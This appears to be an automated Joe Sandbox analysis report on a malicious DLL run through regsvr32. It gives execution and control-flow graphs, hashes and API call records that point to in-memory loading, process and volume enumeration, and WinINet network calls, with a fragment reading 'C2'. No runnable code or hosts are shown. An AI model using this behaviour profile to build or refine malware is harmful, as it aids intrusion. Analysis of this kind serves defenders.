                                                  • Instruction Fuzzy Hash: BC113D7AA2868686EBE49B94DC41B6D63E1F780755F205035E68E43BA4CB3DE404CF01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: DestroyedExceptionFindFrameObjectUnlink
                                                  • String ID: csm
                                                  • API String ID: 1826589669-1018135373
                                                  • Opcode ID: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                  • Instruction ID: 9f3dc625307ec028be1fda2cc305f99b8c00c3b4febe2b6a2618c0b56fcdacc0
                                                  • Opcode Fuzzy Hash: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                  • Instruction Fuzzy Hash: 61114232944681CADFA0DF79C8812BD27E4F795B88F615135EA5D877B1CB26D981C300
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _free_nolock
                                                  • String ID: ("Corrupted pointer passed to _freea", 0)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\malloc.h
                                                  • API String ID: 2882679554-3458198949
                                                  • Opcode ID: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                  • Instruction ID: d33f1896f8d52307a9012ea76dc3fce74adc3acb1f5112dbea688671cc213a85
                                                  • Opcode Fuzzy Hash: fcbdd2152eeca573d64b24b70be95bad50c5d4f9526249e7eb53e402592ebf7b
                                                  • Instruction Fuzzy Hash: 3B01F431A1C78286EBD09B6AE88576EB3D4F390350F614535E6CD43FA9DBBED4058B01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:14.9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:4%
                                                  Total number of Nodes:99
                                                  Total number of Limit Nodes:14
                                                  execution_graph 4060 1800178f4 4063 18000ffc0 4060->4063 4062 180017924 4068 18001000e 4063->4068 4067 1800116b2 4067->4062 4068->4067 4071 180015774 4068->4071 4075 1800078a4 4068->4075 4079 18002975c 4068->4079 4083 180007eb4 4068->4083 4087 18001667c 4068->4087 4073 1800157bd 4071->4073 4074 1800157fb 4073->4074 4095 1800027f8 4073->4095 4074->4068 4078 1800078c0 4075->4078 4077 1800079e2 4077->4068 4078->4077 4102 18001705c 4078->4102 4081 1800297af 4079->4081 4082 180029f99 4081->4082 4113 18000c758 4081->4113 4082->4068 4084 180007ee1 4083->4084 4086 180008118 4084->4086 4129 180011ef8 4084->4129 4086->4068 4092 1800166ac 4087->4092 4091 180016ad3 4091->4068 4092->4091 4132 180023624 4092->4132 4136 180018bdc 4092->4136 4140 18000bc98 4092->4140 4144 18001aec8 4092->4144 4148 1800270c0 4092->4148 4098 180006f2c 4095->4098 4097 18000289c 4097->4073 4099 180006f5d 4098->4099 4100 180007250 Process32NextW 4099->4100 4101 180006fbc 4099->4101 4100->4099 4101->4097 4104 18001707b 4102->4104 4105 1800172eb 4104->4105 4106 180028348 4104->4106 4105->4078 4107 180028431 4106->4107 4108 180028607 4107->4108 4110 180017bf8 4107->4110 4108->4104 4112 180017c7c 4110->4112 4111 180017d21 GetVolumeInformationW 4111->4108 4112->4111 4119 18000c7dc 4113->4119 4114 18000c9b5 4120 18002446c 4114->4120 4115 18000c84b 4115->4081 4119->4114 4119->4115 4123 1800149cc 4119->4123 4126 180016500 4119->4126 4121 1800244af 4120->4121 4122 180024558 InternetOpenW 4121->4122 4122->4115 4125 180014a4c 4123->4125 4124 180014ae5 HttpOpenRequestW 4124->4119 4125->4124 4128 18001657b 4126->4128 4127 18001663c InternetConnectW 4127->4119 4128->4127 4131 180011f57 4129->4131 4130 180012017 CreateThread 4130->4086 4131->4130 4134 180023662 4132->4134 4133 180023683 4133->4092 4134->4133 4152 180018628 4134->4152 4138 180018c18 4136->4138 4137 180011ef8 CreateThread 4137->4138 4138->4137 4139 180018f32 4138->4139 4139->4092 4142 18000bcde 4140->4142 4141 18000c521 4141->4092 4142->4141 4143 180018628 CreateFileW 4142->4143 4143->4142 4146 18001aef6 4144->4146 4145 180011ef8 CreateThread 4145->4146 4146->4145 4147 18001b239 4146->4147 4147->4092 4150 180027157 4148->4150 4149 180027fe1 4149->4092 4150->4149 4151 180018628 CreateFileW 4150->4151 4151->4150 4153 180018660 4152->4153 4155 180018943 4153->4155 4156 18001bf0c 4153->4156 4155->4134 4158 18001bf8e 4156->4158 4157 18001c031 CreateFileW 4157->4153 4158->4157 4159 130000 4160 130183 4159->4160 4161 13043e VirtualAlloc 4160->4161 4164 130462 4161->4164 4162 130531 GetNativeSystemInfo 4163 13056d VirtualAlloc 4162->4163 4165 130a00 4162->4165 4167 13058b 4163->4167 4164->4162 4164->4165 4166 1309d9 VirtualProtect 4166->4167 4167->4165 4167->4166 4167->4167 4168 180011ef8 4170 180011f57 4168->4170 4169 180012017 CreateThread 4170->4169 4171 180018628 4172 180018660 4171->4172 4173 18001bf0c CreateFileW 4172->4173 4174 180018943 4172->4174 4173->4172 4175 18000c819 4179 18000c80c 4175->4179 4176 18000c9b5 4177 18002446c InternetOpenW 4176->4177 4180 18000c84b 4177->4180 4178 1800149cc HttpOpenRequestW 4178->4179 4179->4175 4179->4176 4179->4178 4179->4180 4181 180016500 InternetConnectW 4179->4181 4181->4179

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 130000-130460 call 130aa8 * 2 VirtualAlloc 22 130462-130466 0->22 23 13048a-130494 0->23 24 130468-130488 22->24 26 130a91-130aa6 23->26 27 13049a-13049e 23->27 24->23 24->24 27->26 28 1304a4-1304a8 27->28 28->26 29 1304ae-1304b2 28->29 29->26 30 1304b8-1304bf 29->30 30->26 31 1304c5-1304d2 30->31 31->26 32 1304d8-1304e1 31->32 32->26 33 1304e7-1304f4 32->33 33->26 34 1304fa-130507 33->34 35 130531-130567 GetNativeSystemInfo 34->35 36 130509-130511 34->36 35->26 38 13056d-130589 VirtualAlloc 35->38 37 130513-130518 36->37 39 130521 37->39 40 13051a-13051f 37->40 41 1305a0-1305ac 38->41 42 13058b-13059e 38->42 43 130523-13052f 39->43 40->43 44 1305af-1305b2 41->44 42->41 43->35 43->37 46 1305c1-1305db 44->46 47 1305b4-1305bf 44->47 48 13061b-130622 46->48 49 1305dd-1305e2 46->49 47->44 51 1306db-1306e2 48->51 52 130628-13062f 48->52 50 1305e4-1305ea 49->50 53 13060b-130619 50->53 54 1305ec-130609 50->54 56 130864-13086b 51->56 57 1306e8-1306f9 51->57 52->51 55 130635-130642 52->55 53->48 53->50 54->53 54->54 55->51 60 130648-13064f 55->60 58 130871-13087f 56->58 59 130917-130929 56->59 61 130702-130705 57->61 64 13090e-130911 58->64 62 130a07-130a1a 59->62 63 13092f-130937 59->63 65 130654-130658 60->65 66 130707-13070a 61->66 67 1306fb-1306ff 61->67 90 130a40-130a4a 62->90 91 130a1c-130a27 62->91 69 13093b-13093f 63->69 64->59 68 130884-1308a9 64->68 70 1306c0-1306ca 65->70 71 130788-13078e 66->71 72 13070c-13071d 66->72 67->61 95 130907-13090c 68->95 96 1308ab-1308b1 68->96 76 130945-13095a 69->76 77 1309ec-1309fa 69->77 74 13065a-130669 70->74 75 1306cc-1306d2 70->75 73 130794-1307a2 71->73 72->73 78 13071f-130720 72->78 80 1307a8 73->80 81 13085d-13085e 73->81 86 13066b-130678 74->86 87 13067a-13067e 74->87 75->65 82 1306d4-1306d5 75->82 84 13097b-13097d 76->84 85 13095c-13095e 76->85 77->69 88 130a00-130a01 77->88 89 130722-130784 78->89 92 1307ae-1307d4 80->92 81->56 82->51 100 1309a2-1309a4 84->100 101 13097f-130981 84->101 97 130960-13096c 85->97 98 13096e-130979 85->98 99 1306bd-1306be 86->99 102 130680-13068a 87->102 103 13068c-130690 87->103 88->62 89->89 104 130786 89->104 93 130a7b-130a8e 90->93 94 130a4c-130a54 90->94 105 130a38-130a3e 91->105 127 1307d6-1307d9 92->127 128 130835-130839 92->128 93->26 94->93 107 130a56-130a78 94->107 95->64 116 1308b3-1308b9 96->116 117 1308bb-1308c8 96->117 108 1309be-1309bf 97->108 98->108 99->70 114 1309a6-1309aa 100->114 115 1309ac-1309bb 100->115 109 130983-130987 101->109 110 130989-13098b 101->110 111 1306b6-1306ba 102->111 112 130692-1306a3 103->112 113 1306a5-1306a9 103->113 104->73 105->90 106 130a29-130a35 105->106 106->105 107->93 122 1309c5-1309cb 108->122 109->108 110->100 120 13098d-13098f 110->120 111->99 112->111 113->99 121 1306ab-1306b3 113->121 114->108 115->108 123 1308ea-1308fe 116->123 124 1308d3-1308e5 117->124 125 1308ca-1308d1 117->125 129 130991-130997 120->129 130 130999-1309a0 120->130 121->111 131 1309d9-1309e9 VirtualProtect 122->131 132 1309cd-1309d3 122->132 123->95 138 130900-130905 123->138 124->123 125->124 125->125 134 1307e3-1307f0 127->134 135 1307db-1307e1 127->135 136 130844-130850 128->136 137 13083b 128->137 129->108 130->122 131->77 132->131 140 1307f2-1307f9 134->140 141 1307fb-13080d 134->141 139 130812-13082c 135->139 136->92 142 130856-130857 136->142 137->136 138->96 139->128 144 13082e-130833 139->144 140->140 140->141 141->139 142->81 144->127
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1223112553.0000000000130000.00000040.00001000.00020000.00000000.sdmp, Offset: 00130000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_130000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                  • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                  • API String ID: 2313188843-2517549848
                                                  • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                  • Instruction ID: c3ad375b28d4005cd65bc3de3fd702d44b77b28fe8b76393b77b528eb6f720f0
                                                  • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                  • Instruction Fuzzy Hash: CF72D470618B488FDB2ADF18C8956B9B7E1FB98305F10462DE8CAD7211DB34D986CB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 511 1800248b0-18002490f call 18001feb0 514 180024914 511->514 515 180024916-18002491b 514->515 516 180024921-180024926 515->516 517 180024e2c-180024e96 call 18002a534 515->517 519 180024b7b-180024ba7 516->519 520 18002492c-180024931 516->520 525 180024e9b-180024e9d 517->525 523 180024e0d-180024e22 519->523 524 180024bad-180024bb2 519->524 521 180024937-18002493c 520->521 522 180024b6d-180024b76 520->522 526 180024942-180024947 521->526 527 180024ec7-180024f09 call 18001ce90 521->527 522->515 523->517 528 180024bd3-180024bd5 524->528 529 180024bb4-180024bbb 524->529 530 180024ea9-180024eb6 525->530 531 180024e9f-180024ea4 525->531 532 180024a99-180024b44 call 18001fa00 526->532 533 18002494d-180024952 526->533 545 180024f0e-180024f26 527->545 535 180024bc9-180024bce 528->535 537 180024bd7-180024da0 call 180020aa0 call 180022520 call 1800248b0 528->537 529->535 536 180024bbd-180024bc1 529->536 539 180024ebb-180024ec0 530->539 538 180024b5b-180024b68 531->538 549 180024b49-180024b50 532->549 533->539 541 180024958-180024a94 call 1800234d8 call 180001400 call 180029480 533->541 535->515 536->528 542 180024bc3-180024bc7 536->542 558 180024da5-180024e08 call 180029480 537->558 538->515 544 180024ec2 539->544 539->545 541->514 542->528 542->535 544->515 549->545 552 180024b56 549->552 552->538 558->535
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1223736851.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O}$X$bW
                                                  • API String ID: 0-980370356
                                                  • Opcode ID: e18e412b8bd09892e521a5e3965d89a97fc604b3097fc8c53db2340d1ed33825
                                                  • Instruction ID: a62d154362f2d503ef0efb6b3a203e4a1ee478d45050cbe1ab820923c54e17f6
                                                  • Opcode Fuzzy Hash: e18e412b8bd09892e521a5e3965d89a97fc604b3097fc8c53db2340d1ed33825
                                                  • Instruction Fuzzy Hash: AA02F4715087C88BD799CFA8C48A69EFBE1FB98744F104A1DF4868B260D7F4D949CB42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 562 180006b24-180006b65 563 180006b67-180006b6c 562->563 564 180006b72-180006b77 563->564 565 180006da8-180006e6a call 180029374 563->565 566 180006b79-180006b7e 564->566 567 180006b8b-180006c09 call 180008900 564->567 573 180006e76-180006e7a 565->573 574 180006e6c-180006e71 565->574 569 180006b84-180006b89 566->569 570 180006e7f-180006e84 566->570 575 180006c0e-180006c13 567->575 569->563 570->563 576 180006e8a-180006e8d 570->576 573->570 577 180006d9a-180006da3 574->577 578 180006c19-180006c1e 575->578 579 180006e8f-180006f04 call 180024104 575->579 576->579 580 180006f06-180006f0d 576->580 577->563 578->576 582 180006c24-180006c29 578->582 581 180006f11-180006f2b 579->581 580->581 582->577 585 180006c2f-180006cef call 180029374 582->585 585->576 588 180006cf5-180006d94 call 18002071c call 180024104 585->588 588->576 588->577
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1223736851.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "Gd$C2$HG
                                                  • API String ID: 0-142661339
                                                  • Opcode ID: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                  • Instruction ID: f3040b85d87bafdcd4b0814e46a5c4b4479db0c4bbfe4c952327208bca537128
                                                  • Opcode Fuzzy Hash: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                  • Instruction Fuzzy Hash: 20C112719047CD8FDB89CFA8C88A6ED7BB1FB48354F104229F80697660DBB4D949CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 716 180006f2c-180006f7c call 18001feb0 719 180006f81-180006f86 716->719 720 180007255-180007265 call 18002a150 719->720 721 180006f8c-180006f91 719->721 732 180007271 720->732 733 180007267-18000726c 720->733 722 1800071d4-18000724b call 18001e10c 721->722 723 180006f97-180006f9c 721->723 729 180007250 Process32NextW 722->729 726 180006fa2-180006fa7 723->726 727 1800071c5-1800071cf 723->727 730 1800070e7-1800071a9 call 18000ba20 726->730 731 180006fad-180006fb2 726->731 727->719 729->720 738 1800071ae-1800071b5 730->738 735 180006fb4-180006fb6 731->735 736 180007026-1800070d2 call 180007cf4 731->736 737 180007273-180007278 732->737 733->719 735->737 739 180006fbc-180007008 call 180014b24 735->739 745 1800070d7-1800070e2 736->745 741 18000700d-180007025 737->741 742 18000727e 737->742 738->741 743 1800071bb-1800071c0 738->743 739->741 742->719 743->719 745->719
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1223736851.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $!$e##
                                                  • API String ID: 0-2900154246
                                                  • Opcode ID: c6b9a8fabe697f5b2ca67d9c03e63fc4ca39ad07d0e3d1e241ff45a68ef3815c
                                                  • Instruction ID: 216da8bcfa57d9aa83ad41f20fe658cab1eb670466840fb7186bd91b9371edf3
                                                  • Opcode Fuzzy Hash: c6b9a8fabe697f5b2ca67d9c03e63fc4ca39ad07d0e3d1e241ff45a68ef3815c
                                                  • Instruction Fuzzy Hash: 7B8190705187889BD7E8DF14C4C979EBBE1FB98344F905A1CF89A8B261CB74C948CB42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 403 18002446c-1800244c1 call 18001feb0 406 1800244c7-180024552 call 180026974 403->406 407 180024558-18002456e InternetOpenW 403->407 406->407
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1223736851.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InternetOpen
                                                  • String ID: &J@$Va$Z*
                                                  • API String ID: 2038078732-1197100596
                                                  • Opcode ID: 66813e264fa1cc35a44db824818c230c237c196eb5c6617bb8c0918fb9f82c0e
                                                  • Instruction ID: 28a15b3c09fe6a2aa9f5eb42736a691d582ff290fd3432c8dba93e18a197623f
                                                  • Opcode Fuzzy Hash: 66813e264fa1cc35a44db824818c230c237c196eb5c6617bb8c0918fb9f82c0e
                                                  • Instruction Fuzzy Hash: 8A212F715187898FD3A8DF28C0493ABB7E1FB98319F408A1DE4CAC6391DB799448CB06
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 629 18001bf0c-18001bfb0 call 18001feb0 632 18001bfb2-18001c02b call 180026974 629->632 633 18001c031-18001c063 CreateFileW 629->633 632->633
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1223736851.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: `/
                                                  • API String ID: 823142352-1163903809
                                                  • Opcode ID: 9329703c180bff9c13a57ad2c9d4e17d6ae624210817fa9d3c733bf06a68d3a6
                                                  • Instruction ID: f11eb3e7a352e1f1819d3b1e5829977cbaca57bf71308e5d5317c3bcacfeb84e
                                                  • Opcode Fuzzy Hash: 9329703c180bff9c13a57ad2c9d4e17d6ae624210817fa9d3c733bf06a68d3a6
                                                  • Instruction Fuzzy Hash: 6C3137B061CB848FD364DF18D48579ABBE0FB88314F504A2EE88DC3362DB749845CB86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1223736851.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ConnectInternet
                                                  • String ID:
                                                  • API String ID: 3050416762-0
                                                  • Opcode ID: 696bad1b1d1373c4a188d8be72565791f44f69a250ba4c3bd44038e3e2a3a9cf
                                                  • Instruction ID: 6bd4319daaf70d9cfa93cd172db4ac0144cd1887b423fd46bbb7d9a578168b32
                                                  • Opcode Fuzzy Hash: 696bad1b1d1373c4a188d8be72565791f44f69a250ba4c3bd44038e3e2a3a9cf
                                                  • Instruction Fuzzy Hash: 8C41F7705087848FC7B8DF58D48579ABBE0FB98315F108A5EE48DD7361DB749884CB86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1223736851.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InformationVolume
                                                  • String ID:
                                                  • API String ID: 2039140958-0
                                                  • Opcode ID: 1949fae2aaba8b4119d5023be7d4790b480e02f5c580bad52ddd601b650acc4f
                                                  • Instruction ID: e87697cfd510fd4059a611545946932b1d04e28e1a34b551021fd5cd6805f499
                                                  • Opcode Fuzzy Hash: 1949fae2aaba8b4119d5023be7d4790b480e02f5c580bad52ddd601b650acc4f
                                                  • Instruction Fuzzy Hash: AB31E770618B888FD7B8CF68D4857AAB7E1FB89315F508A1EE48DC7251CB749845CB43
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1223736851.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HttpOpenRequest
                                                  • String ID:
                                                  • API String ID: 1984915467-0
                                                  • Opcode ID: 2abca7ab27ce1f38676343e57d0af3d26f331b1f8e41c5eb7387a3a1acb3ccf2
                                                  • Instruction ID: c8d36c456ba033a28ec6fbd746a54a3663befea28eedef4c15a9fc959fe4c155
                                                  • Opcode Fuzzy Hash: 2abca7ab27ce1f38676343e57d0af3d26f331b1f8e41c5eb7387a3a1acb3ccf2
                                                  • Instruction Fuzzy Hash: D331607050CB848BE7B4DF08D4C9B9AB7E0FB98315F108A4DE48DD7296CB789484CB46
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1223736851.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: 43f2add25367f37c20804a12f5309876908a740bd4f725cbfb4cce081a5c4e54
                                                  • Instruction ID: 87f7a9be59381a5b3d954798ed335bb6745bcd8ebd0cdd375d804fe942fcfa66
                                                  • Opcode Fuzzy Hash: 43f2add25367f37c20804a12f5309876908a740bd4f725cbfb4cce081a5c4e54
                                                  • Instruction Fuzzy Hash: 7A312B7160CB848FDBA8DF18E48579AB7E1FB98314F10465EE88CC7396DB309984CB46
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:6.7%
                                                  Dynamic/Decrypted Code Coverage:2.5%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:1873
                                                  Total number of Limit Nodes:40
                                                  execution_graph 16679 7fef7545393 16680 7fef75453a0 16679->16680 16681 7fef75453b4 __SehTransFilter 16680->16681 16682 7fef75453cc 16680->16682 16688 7fef75454a0 RaiseException 16681->16688 16689 7fef75454a0 RaiseException 16682->16689 16684 7fef75453ca 16690 7fef753ed30 16684->16690 16687 7fef75453e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 16688->16684 16689->16684 16691 7fef753ed3e 16690->16691 16693 7fef753ed4c 16691->16693 16696 7fef753cf80 DecodePointer 16691->16696 16694 7fef753ed88 16693->16694 16695 7fef753cf80 _inconsistency 36 API calls 16693->16695 16694->16687 16695->16694 16697 7fef753cf9e 16696->16697 16700 7fef753cf50 16697->16700 16702 7fef753cf59 16700->16702 16704 7fef75439e0 16702->16704 16705 7fef75439fa 16704->16705 16714 7fef753d430 DecodePointer 16705->16714 16707 7fef7543a09 16710 7fef7543a20 16707->16710 16715 7fef753cff0 16707->16715 16709 7fef7543a42 16727 7fef7537090 16709->16727 16710->16709 16711 7fef753be50 _invalid_parameter 14 API calls 16710->16711 16711->16709 16714->16707 16716 7fef753d02a 16715->16716 16717 7fef753d19a 16716->16717 16718 7fef753d1d8 DecodePointer 16716->16718 16721 7fef753bd70 _invalid_parameter 17 API calls 16717->16721 16719 7fef753d1e8 16718->16719 16720 7fef753d1ce 16719->16720 16722 7fef7537090 _exit 33 API calls 16719->16722 16723 7fef753d209 16719->16723 16720->16710 16721->16720 16722->16723 16725 7fef753d289 16723->16725 16730 7fef7533d00 RtlEncodePointer 16723->16730 16725->16720 16731 7fef7539360 LeaveCriticalSection 16725->16731 16728 7fef7537280 _exit 33 API calls 16727->16728 16729 7fef75370a9 16728->16729 16729->16693 16730->16725 16731->16720 17604 7fef7542695 17605 7fef75426a0 17604->17605 17606 7fef753bd70 _invalid_parameter 17 API calls 17605->17606 17607 7fef75426ab 17605->17607 17606->17607 17608 7fef7544a95 17610 7fef7544aad __SehTransFilter 17608->17610 17609 7fef7544c2b 17610->17609 17611 7fef7545180 __SehTransFilter 38 API calls 17610->17611 17611->17609 18099 7fef753c990 18103 7fef7534980 18099->18103 18101 7fef753c9b8 EncodePointer 18102 7fef753c9e5 18101->18102 18104 7fef75349cb _calloc_dbg_impl 18103->18104 18104->18101 18566 180024ee6 18567 180024eea 18566->18567 18568 180024f52 18566->18568 18569 18002506a CreateProcessW 18568->18569 16503 7fef7534399 16504 7fef75343a6 16503->16504 16506 7fef7534377 16503->16506 16506->16503 16506->16504 16507 7fef753abb0 DecodePointer 16506->16507 16508 7fef753abd3 16507->16508 16508->16506 16509 7fef7533599 16512 7fef7538900 16509->16512 16511 7fef753359e 16513 7fef7538920 16512->16513 16514 7fef7538936 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 16512->16514 16513->16511 16515 7fef75389de 16514->16515 16515->16513 16516 1800178f4 16519 18000ffc0 16516->16519 16518 180017924 16522 18001000e 16519->16522 16520 180011bd0 16531 1800053b0 16520->16531 16522->16520 16524 1800116b2 16522->16524 16525 18001667c 16522->16525 16524->16518 16528 1800166ac 16525->16528 16529 180016ad3 16528->16529 16535 180023624 16528->16535 16539 18000bc98 16528->16539 16543 1800270c0 16528->16543 16529->16522 16533 1800053e0 16531->16533 16532 18001a10c CreateProcessW 16534 18000598b 16532->16534 16533->16532 16533->16534 16534->16524 16538 180023662 16535->16538 16537 1800237ae 16537->16528 16538->16537 16547 18001a10c 16538->16547 16542 18000bcde 16539->16542 16540 18001a10c CreateProcessW 16541 18000c521 16540->16541 16541->16528 16542->16540 16542->16541 16546 180027157 16543->16546 16544 180027fe1 16544->16528 16545 18001a10c CreateProcessW 16545->16546 16546->16544 16546->16545 16548 18001a166 16547->16548 16549 180024f28 CreateProcessW 16548->16549 16550 18001a335 16549->16550 16550->16537 18581 7fef753c080 HeapValidate 18582 7fef753c0a2 18581->18582 18131 7fef754b580 18132 7fef754b5fa 18131->18132 18133 7fef754b6cb 18132->18133 18134 7fef754b676 18132->18134 18135 7fef754afb0 _fflush_nolock 17 API calls 18133->18135 18137 7fef754b6fe 18133->18137 18136 7fef753bd70 _invalid_parameter 17 API calls 18134->18136 18135->18137 18143 7fef754b6aa _LocaleUpdate::~_LocaleUpdate 18136->18143 18138 7fef754b8a2 18137->18138 18139 7fef754b84d 18137->18139 18142 7fef754b915 18138->18142 18149 7fef754b96a 18138->18149 18140 7fef753bd70 _invalid_parameter 17 API calls 18139->18140 18140->18143 18141 7fef7533280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18144 7fef754cd90 18141->18144 18145 7fef753bd70 _invalid_parameter 17 API calls 18142->18145 18143->18141 18145->18143 18146 7fef754cc93 18146->18143 18147 7fef753bd70 _invalid_parameter 17 API calls 18146->18147 18147->18143 18148 7fef754bada 18150 7fef753bd70 _invalid_parameter 17 API calls 18148->18150 18149->18146 18149->18148 18150->18143 16736 7fef754df8d 16738 7fef754dfbb 16736->16738 16737 7fef754eadf 16763 7fef754ef10 16737->16763 16738->16737 16746 7fef754da75 16738->16746 16759 7fef754eec0 16738->16759 16741 7fef754eafd 